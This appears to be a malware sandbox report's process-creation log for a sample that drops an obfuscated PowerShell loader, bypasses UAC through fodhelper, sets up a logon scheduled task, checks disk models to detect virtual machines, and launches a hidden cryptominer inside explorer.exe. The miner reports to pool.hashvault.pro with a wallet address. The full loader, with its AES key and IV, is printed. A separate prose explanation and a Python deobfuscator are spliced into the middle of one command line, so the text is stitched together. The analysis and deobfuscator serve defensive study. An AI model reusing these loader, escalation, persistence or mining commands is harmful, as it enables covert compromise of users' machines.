        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[C
har](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
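Two PowerShell obfuscation idioms appear in the command lines above. The b.bat / $rbx-CO2.bat loader hides every type name behind the junk token blck and strips it with .Replace('blck', '') immediately before Invoke-Expression; once stripped, the script reads the first line of its own .bat that starts with ":: ", splits it on "\", base64-decodes each part, decrypts it with AES-CBC under a hard-coded 32-byte key and 16-byte IV, GZip-decompresses the result and hands it to [Reflection.Assembly]::Load followed by EntryPoint.Invoke. The later powershell.EXE invocations build every string from ''+[Char](82)+'e'+... concatenations; resolved, they spell ReflectedDelegate, InMemoryModule, MyDelegateType, System.dll and Microsoft.Win32.UnsafeNativeMethods, which is the reflective delegate pattern for calling native functions without Add-Type. The following is an added example, not code from the report or from the sample: a static deobfuscator for both idioms, exercised on fragments copied from the lines above. The regular expressions assume single-quoted PowerShell literals without embedded quotes, which holds for this loader but not for PowerShell in general.

```python
import re

# Constructed excerpts, copied from the PowerShell command lines listed above, to exercise
# the two deobfuscation steps. They are fragments of the loader, not the whole script.
SAMPLE_CHAR_CONCAT = (
    "New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'"
    "+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')"
)
SAMPLE_GETTYPE = (
    ".GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''"
    "+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'"
    "+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''"
    "+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s')"
)
SAMPLE_BLCK = (
    "Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck."
    "blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); "
    "Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]"
    "blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck"
    "($fKndv[0])));'.Replace('blck', '');"
)

# One operand of a PowerShell string concatenation: a single-quoted literal ('' escapes a
# quote) or a [Char](N) cast. A run of two or more operands joined by + is folded.
_PIECE = r"(?:'(?:[^']|'')*'|\[char\]\(\d+\))"
_CONCAT = re.compile(_PIECE + r"(?:\s*\+\s*" + _PIECE + r")+", re.I)
_PIECE_RE = re.compile(r"'((?:[^']|'')*)'|\[char\]\((\d+)\)", re.I)
# '<literal>'.Replace('<token>', '') with an empty replacement, as the loader uses it.
_REPLACE = re.compile(r"'([^']*)'\.Replace\('([^']+)',\s*''\)", re.I)


def _eval_piece(m):
    """Value of one operand: chr(N) for [Char](N), the unescaped text for a literal."""
    if m.group(2) is not None:
        return chr(int(m.group(2)))
    return m.group(1).replace("''", "'")


def fold_char_concat(text):
    """Replace every ''+[Char](N)+'x'+... run with the single literal it evaluates to."""
    def repl(m):
        value = "".join(_eval_piece(p) for p in _PIECE_RE.finditer(m.group(0)))
        return "'" + value.replace("'", "''") + "'"
    return _CONCAT.sub(repl, text)


def apply_replace_tokens(text):
    """Perform '...'.Replace('token', '') statically, removing the junk token."""
    return _REPLACE.sub(lambda m: "'" + m.group(1).replace(m.group(2), "") + "'", text)


def deobfuscate(text, max_rounds=10):
    """Alternate both passes until the text stops changing (nested idioms need a second pass)."""
    for _ in range(max_rounds):
        new = apply_replace_tokens(fold_char_concat(text))
        if new == text:
            return new
        text = new
    return text


def literals(text):
    """All single-quoted literal contents in (deobfuscated) text, for quick triage."""
    return [s.replace("''", "'") for s in re.findall(r"'((?:[^']|'')*)'", text)]


if __name__ == "__main__":
    for sample in (SAMPLE_CHAR_CONCAT, SAMPLE_GETTYPE, SAMPLE_BLCK):
        print(deobfuscate(sample))
```

Feeding the complete command lines from this report through deobfuscate() yields readable PowerShell; the literals() list then exposes the reflective-delegate type names and the System.IO / System.Reflection calls directly. The AES stage itself cannot be reproduced from this page because the ciphertext lives in the ":: " comment line of the dropped .bat, which the report does not show; with that file in hand, the key and IV printed in the command line are all that is needed to decrypt it.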
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "Jump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" Jump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Process created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
        Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
